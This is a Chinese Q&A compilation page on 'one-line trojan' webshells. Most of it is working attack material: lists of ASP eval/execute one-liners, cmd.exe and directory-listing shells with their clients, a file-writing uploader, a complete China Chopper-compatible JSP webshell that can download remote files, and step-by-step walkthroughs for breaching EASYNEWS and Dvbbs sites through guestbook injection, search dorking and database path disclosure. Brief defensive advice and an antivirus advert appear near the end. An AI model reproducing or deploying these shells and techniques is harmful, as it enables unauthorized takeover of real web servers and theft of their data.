改寫一句話木馬連接雲伺服器

『壹』 一句話木馬的使用方法

首先,找到資料庫是asp格式的網站,然後,以留言板,或者發表文章的方式,把一句話添加到asp資料庫，或者加進asp網頁.
記住!我們的目的是把一句話<%execute request(value)%>添加到資料庫,無論任何方式!
然後打開客戶端(就是你電腦上面的那個htm文件),填上加入了一句話的asp文件,或者是asp網頁,然後進入此網站伺服器。

『貳』 一句話木馬怎樣用

一句話插入某頁面。然後用一句話服務端連接。上傳大馬小馬。得到webshell。

『叄』 超高分求 asp一句話木馬~

ASP一句話木馬大全！

<%eval request("MH")%>

<%execute request("MH")%>

<%execute(request("MH"))%>

<%If Request("MH")<>"" Then Execute(Request("MH"))%>

<%if request ("MH")<>""then session("MH")=request("MH"):end if:if session("MH")<>"" then execute session("MH")%>

<SCRIPT language=VBScript runat="server">execute request("MH")</SCRIPT>

<%@ Page Language="Jscript"%>

<%eval(Request.Item["MH"],"unsafe");%>

1 asp一句話木馬
一句話木馬 伺服器端
帶驗證:
——————————————cmd.asp————————————————
<%
if request("authkey")="pic16f873a" then
%>
<textarea readonly cols=80 rows=25>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%>
</textarea>
<%
end if
%>

帶驗證 客戶端
——————————————cmd.html————————————————
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=gbk">
</HEAD>
<div align=center>
<FORM method=post name=frm target=_blank>
Host:<input type=text name=act size=65 value="http://">
<br>
<br>
Cmd :<input type=text name=cmd size=65 value="cmd">
<br>
<br>
<input type=hidden name=authkey value="pic16f873a">
<Input name=Send
onclick="javascipt:frm.action=document.frm.act.value;
frm.submit();"
type=button value="Send Command">
</FORM>
</div>

目錄瀏覽

伺服器端
_________________________________________
<%
if request("authkey")="pic16f873a" then
szPara = Request.Form("path")
set shell=server.createobject("shell.application")
set dir1=shell.namespace(szPara)
set diritems=dir1.items

for each iii in diritems
response.write iii.path & "<font color=blue>[" & iii.size &"]</font><br>"
next
end if
%>
_________________________________________
客戶端
__________________________________________
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=gbk">
</HEAD>
<div align=center>
<FORM method=post name=frm target=_blank>
Host:<input type=text name=act size=65 value="http://">
<br>
<br>
Path:<input type=text name=path size=65 value="C:\">
<br>
<br>
<input type=hidden name=authkey value="pic16f873a">
<Input name=Send onclick="Javascipt:frm.action=document.frm.act.value;frm.submit();"
type=button value="Send Command">

</FORM>
</div>

一句話木馬客戶端源文件：

裡面涉及到一些腳本知識，我就只講解一下功能和簡單注釋，不詳細講了，大家只要注意幾個注意點就行了
***********************************************************

<form action=http://cjy.xjife.e.cn/news/ebook/db/ebook.asp method=post>
//"action="後面是需要修改的以asp命名的資料庫的提交地址
//這個標簽的意思是建立一個表單 以post方式提交給連接http://cjy.xjife.e.cn/news/ebook/db/ebook.asp處理

<textarea name=value cols=120 rows=10 width=45>
//這里的value值根據服務端<%execute request("value")%>中value而設定
//可以自行修改成<%execute request("p")%>相應這里的value值也必須改為p

set lP=server.createObject("Adodb.Stream")//建立流對象，有了對象才可以使用它固有的屬性和方法
lP.Open //打開
lP.Type=2 //以文本方式
lP.CharSet="gb2312" //字體標准
lP.writetext request("joeving") //取得木馬內容 參數joeving可以自己定義 但必須和下面的name=joeving相對應
lP.SaveToFile server.mappath("wei.asp"),2
//將木馬內容以覆蓋文件的方式寫入wei.asp
//2就是已覆蓋的方式，這里的wei.asp也是可以自己定義的，如定義成1.asp
//但和下面的response.redirect"wei.asp"中wei.asp的保持一致
lP.Close //關閉對象
set lP=nothing //釋放對象
response.redirect "wei.asp" //轉向生成的wei.asp 和上面的wei.asp相對應，也就是你熟悉的asp木馬登 陸界面
</textarea>
//這段程序的功能：利用插入到資料庫文件的<%execute request("value")%>這段代碼執行第一個textarea中的內容，並將添加的木馬內容寫入和指向wei.asp，這樣就相當於在伺服器上建立了個asp木馬文件，這樣就可以取得webshell了

<textarea name=joeving cols=120 rows=10 width=45>添入生成木馬的內容/textarea><BR><center><br>
//這段標簽是你用來添加木馬內容用的

<input type=submit value=提交>
</form>

***********************************************************

//程序的主要框架是
<form>
<textarea></textarea>//取得木馬內容並用無組件上傳技術在伺服器端創建asp木馬文件並顯示
<textarea></textarea>//添加木馬內容用的
</form>
其實都是些很簡單的一些html和asp的知識，大家不妨自己寫個自己的木馬客戶端~~~呵呵

『肆』 一句話木馬怎麼插和我插了一句話木馬之後那個打開網址然後上傳代碼的網址是多少那些教程里沒有說那個地址

一句話木馬插入方法：第一種：先判斷資料庫是asp或其他格式，若為asp格式，可通過留言本向資料庫插入一句話代碼，插入後，用中國菜刀連接留言本資料庫地址（資料庫地址可以通過暴庫爆出路徑，暴不出路徑，就用工具強行掃描，看是否能掃到資料庫地址）就得到webshell了。第二種：進入網站後台，然後修改網站名，把網站名修改成一句話木馬代碼，記住，要閉合插入一句話，即

"%><%evalrequest("這里換成你喜歡設的密碼"%><%s="'閉合的一句話木馬代碼
<%evalrequest("這里換成你喜歡設的密碼"%>'未閉合的一句話木馬代碼

有一次，我進了一個網站後台，修改網站名時，沒有閉合插入一句話木馬代碼，致使後台出現了403錯誤，無法打開，白浪費了一個網站。閉合插入並保存後，用中國菜刀連接網站配置文件（配置文件路徑可以通過插入未閉合的一句話木馬代碼，不保存，點擊後台別的位置，會出現錯誤提示，下面的路徑就是網站配置文件的路徑），因為網站名等信息在網站的配置文件中，就要連接配置文件，成功後，你就得到了網站webshell了。

總之，我是這樣拿站的，希望這些方法對你有用。

『伍』 如何使用JSP一句話木馬和菜刀木馬

相信用過一句話木馬的黑闊們對中國菜刀這個程序不會感到陌生，小弟也曾使用PHP一句話木馬輕松lcx了很多站。近期Struts2重定向漏洞瘋狂來襲，不少黑闊們都摩拳擦掌、爭先恐後的尋找屬於自己的那群「小肉雞」。由於工作需要，我也對幾個站點做了Struts2重定向漏洞的測試，所有使用Struts2框架的網站安全問題均不容樂觀，中標率幾乎達到了85%以上。也許一場血雨腥風的Struts2漏洞利用潮即將來臨。
說了這么多廢話，本文的目的是什麼呢？其實只是想記錄一下JSP幾種後門代碼啦，因為曾經找JSP菜刀馬找的老辛苦了。
1、首先是JSP一句話木馬和它的客戶端小夥伴。（小夥伴們都驚呆了~~~）
以下是服務端，保存成one.jsp並上傳至目標伺服器中。
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
通過使用一句話木馬客戶端連接one.jsp木馬。
將下列代碼保存為html頁面：
<html><head><title>JSP一句話木馬客戶端</title></head><div align=center> <font color=red>專用JSP木馬連接器</font><br><form name=get method=post>服務端地址<input name=url size=110 type=text> <br><br><textarea name=t rows=20 cols=120>你提交的代碼</textarea><br>保存成的文件名：<input name=f size=30 value=shell.jsp><input type=button onclick="javascript:get.action=document.get.url.value;get.submit()" value=提交> </form> <br>服務端代碼：<br><textarea rows=5 cols=120><%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> </textarea> </div></body>
保存完成後，打開html頁面，寫入一句話木馬服務端地址，例如http://www.cto365.com/one.jsp，寫入需要的代碼和保存的文件名稱點擊保存即可。

2、中國菜刀能用的菜刀馬
本文除了對jsp一句話木馬進行了說明，還提供了一個中國菜刀能用的菜刀馬。
將下列代碼保存為xx.jsp並上傳至目標伺服器，使用中國菜刀工具進行連接。
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%><%!String Pwd="cto365.com";String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);}Connection GC(String s)throws Exception{String[] x=s.trim().split("rn");Class.forName(x[0].trim()).newInstance();Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;}void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i<r.length;i++){sb.append(r[i].toString().substring(0,2));}}void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT, sQ,sF="";java.util.Date dt;SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0;i<l.length;i++){dt=new java.util.Date(l[i].lastModified());sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ+=l[i].canWrite()?" W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/t"+sT+"t"+l[i].length()+"t"+sQ+"n");}else{sF+=l[i].getName()+"t"+sT+"t"+l[i].length()+"t"+sQ+"n";}}sb.append(sF);}void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();for(int k=0;k<x.length;k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();}void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile();FileOutputStream os=new FileOutputStream(f);for(int i=0;i<d.length();i+=2){os.write((h.indexOf(d.charAt(i))<<4|h.indexOf(d.charAt(i+1))));}os.close();}void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();for(int j=0;j<z.length;j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}void LL(String s, String d)throws Exception{URL u=new URL(s);int n;FileOutputStream os=new FileOutputStream(d);HttpURLConnection h=(HttpURLConnection)u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}void MM(InputStream is, StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));while((l=br.readLine())!=null){sb.append(l+"rn");}}void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=c.getMetaData().getCatalogs();while(r.next()){sb.append(r.getString(1)+"t");}r.close();c.close();}void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] t={"TABLE"};ResultSet r=c.getMetaData().getTables (null,null,"%",t);while(r.next()){sb.append(r.getString("TABLE_NAME")+"t");}r.close();c.close();}void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("rn");Connection c=GC(s);Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[3]);ResultSetMetaData d=r.getMetaData();for(int i=1;i<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")t");}r.close();m.close();c.close();}void QQ(String cs,String s,String q,StringBuffer sb)throws Exception{int i;Connection c=GC(s);Statement m=c.createStatement(1005,1008);try{ResultSet r=m.executeQuery(q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(i=1;i<=n;i++){sb.append(d.getColumnName(i)+"t|t");}sb.append("rn");while(r.next()){for(i=1;i<=n;i++){sb.append(EC(r.getString(i),cs)+"t|t");}sb.append("rn");}r.close();}catch(Exception e){sb.append("Resultt|trn");try{m.executeUpdate(q);sb.append("Execute Successfully!t|trn");}catch(Exception ee){sb.append(ee.toString()+"t|trn");}}m.close();c.close();}%><%String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs);String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs);StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|");if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"t");if(!s.substring(0,1).equals("/")){AA(sb);}}else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));while((l=br.readLine())!=null){sb.append(l+"rn");}br.close();}else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);}}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString());%>

『陸』 什麼是一句話木馬

一句話木馬的使用

實例一：「一句話木馬」入侵「EASYNEWS新聞管理系統」

「EASYNEWS新聞管理系統 v1.01 正式版」是在企業網站中非常常見的一套整站模版，在該網站系統的留言本組件中就存在著數據過濾不嚴漏洞，如果網站是默認路徑和默認文件名安裝的話，入侵者可以利用該漏洞直接上傳ASP木馬程序控制整個網站伺服器。

Step1 搜索入侵目標

使用了「EASYNEWS新聞管理系統 v1.01 正式版」的網站，在網站頁面的底部版權聲明處，往往會有關鍵字元為「www.****.COM 版權所有」。只要在GOOGLE或網路中以該字元串為關鍵詞進行搜索，就可以找到大量的入侵目標。

Step2 檢測入侵條件

在這里，我們以網站「http://www.****.com/news/index.htm」為例進行一次入侵檢測。「EASYNEWS新聞管理系統」網站的留言本資料庫文件默認是位於「\ebook\db\ebook.asp」，首先在瀏覽器地址欄中輸入「http://www.****.com/news/ebook/db/ebook.asp」，回車後在瀏覽器頁面中將顯示訪問留言本資料庫文件的返回信息。如果在頁面中顯示亂碼，則說明該網站的留言本資料庫文件沒有改名，可以進行入侵。

Step3 在資料庫中插入ASP後門

前面提到了該新聞系統的留言本插件存在過濾不嚴，因此我們可以通過提交發言，在資料庫中插入「一句話木馬」服務端代碼：

在瀏覽器中訪問「http://www.****.com/news/khly.htm」，打開提交留言頁面。在提交頁面中的「主頁」欄中，直接填寫「一句話木馬」服務端代碼，其它隨便填寫。確定後點擊「發表留言」按鈕，文章發表成功後，即可將「一句話木馬」服務端代碼插入到留言本資料庫中了。

Step4 連接後門上傳Webshell

由於留言本資料庫文件「ebook.asp」是一個ASP文件，所以我們插入到資料庫文件中的ASP語句將會被執行。將「一句話木馬」客戶端中的提交地址改為留言本資料庫文件地址，然後用瀏覽器打開客戶端，在上方的輸入框中輸入上傳ASP木馬的保存路徑，在下面的輸入框中可以粘貼入其它的ASP木馬代碼，這里選擇的是桂林老兵網站管理助手ASP代碼。點擊提交按鈕後，剛才粘貼的ASP木馬將被寫入到論壇伺服器中保存。

Step5 打開WEBSHELL

上傳的ASP木馬被保存到與資料庫文件同一WEB目錄下，文件名為「temp.asp」，因此我們在IE瀏覽器中打開頁面「http://www.****.com/news/ebook/db/temp.asp」，輸入默認的密碼「gxgl.com」，就可以看到一個WEBSHELL了。

在Webshell中可以上傳其它的文件或者安裝木馬後門、執行各種命令等，網站的伺服器已經掌握在我們的手中，可以為所欲為了。

實例二 「社區超市」入侵動網論壇

Step1 檢測入侵條件

以入侵論壇「http://www.****.com/」為例。首先在瀏覽器地址欄中輸入「http://www.****.com/data/shop.asp」，回車後在瀏覽器頁面中將顯示訪問"shop.asp"文件的返回信息。說明該論壇的社區超市資料庫文件沒有改名或刪除，可以進行入侵。

Step2 在資料庫中插入ASP後門

登錄論壇後，點擊頁面中的「娛樂」→「社區超市」，打開社區超市頁面。在該頁面中選擇商店申請，打開「商店申請入駐」頁面「http://www.****.com/z_shop_newshop.asp」，在頁面中填寫任意信息，注意在「商店招牌」欄中，添加剛才的ASP代碼"〈%execute request("l")%〉"。確定後點擊「申請」按鈕進行提交，即可將ASP代碼保存在資料庫文件中了。

後面的步驟就與上面介紹的一樣了，只需要用藍屏木馬連接資料庫文件「http://sdoygb.w2.****.net/data/shop.asp」，然後上傳WEBSHELL就可以控制論壇伺服器了。

實例三 「一句話木馬」入侵未知網站

從上面的兩個例子，我們可以看出利用「一句話木馬」入侵控制存在資料庫過濾不嚴漏洞的網站，成功的前提是一定要知道網站的資料庫地址。對於一些使用了未知網頁程序的網站，我們如何才能找到它的資料庫地址呢？這就要結合暴庫或者跨站之類的方法了，下面只是結合一個簡單的暴庫，介紹一下利用一句話木馬入侵未知網站的方法。

Step1 暴庫得到資料庫路徑

以「http://bbs.****.com」為例。在瀏覽器中打開「http://bbs.****.com/join/listall.asp?bid=2」，將地址欄中join後的/改為%5c，在提交後的返回返回信息中可以看到網站資料庫地址：「』d:\wwwroot\shuilong\wwwroot\admin\adshuilonG!#).asp』」，資料庫文件名中加入了「#」符號，「#」符號在IE中執行時被解釋為中斷符，要訪問該資料庫文件則必須將「#」號變為「23%」才可以。因此資料庫文件的實際WEB地址為「http://bbs.****.com/join/admin/adshuilonG!%23).asp」

Step2 注冊網站，插入「一句話木馬」

由於資料庫文件是ASP文件格式的，滿足入侵條件，因此現在我們需要將「一句話木馬」插入到資料庫文件中去。

在網頁上點擊注冊網站按鈕，打開注冊鏈接「http://bbs.****.com/join/add.asp過濾了=step3&bid=3」，在資料填寫頁面處的站點名稱或地址中寫入「一句話木馬」服務端代碼，其它隨便填寫。然後點擊完成按鈕提交數據，木馬服務端就被插入到資料庫文件中了。

最後只需要用藍屏木馬連接資料庫文件「http://bbs.****.com/join/admin/adshuilonG!%23).asp」，然後上傳ASP木馬就可以控制該網站的伺服器了。

「一句話木馬」的防範

要防範「一句話木馬」可以從兩方面進行，首先是要隱藏網站的資料庫，不要讓攻擊者知道資料庫文件的鏈接地址。這就需要管理員在網頁程序中查被暴庫漏洞，在資料庫連接文件中加入容錯代碼等，具體的防暴庫方法在這里就不作過多的講解了。

其次就是要防止用戶提交的數據未過濾漏洞，對用戶提交的數據進行過濾，替換一些危險的代碼等。例如中國站長聯盟網站在出現該漏洞後已經對網頁程序進行的修補，插入的ASP代碼中的〈、〉和"等字元會被網頁程序轉換成其它字元，致使服務端代碼無法正常執行。

只要作好這兩方面的安全工作，「一句話木馬」雖然無孔不入，但是面對這樣的網站系統也是無可奈何的了。

『柒』 我想知道一句話木馬的簡易使用方法~！

藍屏大叔一句話木馬共用兩個文件,藍屏大叔一句話木馬服務端和連接端(藍屏大叔一句話服務端.asp/藍屏大叔連接端.htm)

簡單的介紹一下鏈接方法,這是鏈接端的內容:

<form action=http://你的木馬網址 method=post> <!--網址改為你的後門地址-->

<textarea name=value cols=120 rows=10 width=45>

set lP=server.createObject("Adodb.Stream")

lP.Open

lP.Type=2

lP.CharSet="gb2312"

lP.writetext request("fhod")

lP.SaveToFile server.mappath("ck.asp"),2

lP.Close

set lP=nothing

response.redirect "ck.asp"

</textarea>

<textarea name=fhod cols=120 rows=10 width=45>添入生成木馬的內容</textarea><BR><center><br>

<input type=submit value=提交>

這是服務端即上傳到肉雞上的木馬內容:

<%execute request("value")%>

就這一句話

給大家看下效果,首先將"藍屏大叔一句話服務端.asp"上傳到肉雞,如下圖.我改了名為"daishu.asp"

然後打開"藍屏大叔連接端.htm"源文件(打開方法"右鍵單擊"藍屏大叔連接端.htm"選擇用記事本打開"如下圖,把"http://你

的木馬網址"這上段內容改成你的服務端地址即可

保存退出,打開"藍屏大叔連接端.htm",在"添入生成木馬的內容"文本框中輸入你的木馬內容即可,比如這里把"站長助手"上

傳上去,只要把"站長助手的源文件復制到這裡面即可,點上傳,看下圖效果:

站長助手源代碼復制到這里效果

上傳的默認文件名為"ck.asp"輸入密碼就可以進入了

『捌』 一句話木馬

您好：

建議您不要傳播或使用一句話木馬，一句話木馬會對您的電腦造成損害的，如果您曾使用過此類不安全的一句話木馬的話，為了您電腦的安全，建議您使用騰訊電腦管家對您的電腦進行一下全面的殺毒吧，打開騰訊電腦管家中的殺毒功能選擇閃電查殺或者全盤查殺就可以，您可以點擊這里下載最新版的騰訊電腦管家：最新版騰訊電腦管家下載

騰訊電腦管家企業平台：http://..com/c/guanjia/

『玖』 我的伺服器可以iis寫入。。。被人寫了 一句話木馬 好多次了。。555怎麼辦

1、首先做好伺服器基本安全，比如磁碟許可權、資料庫等
2、做好網站目錄安全，網站獨立許可權，相互不幹擾；
3、用護衛神安全套裝，針對網站定製規則，不修改網站代碼，徹底防止掛馬和篡改。

『拾』 一句話木馬圖片合二為一後，上傳到伺服器了，客戶端連不上！！結尾是

上傳後改下後綴，學習拿站拿伺服器首選，烏龍寺技術站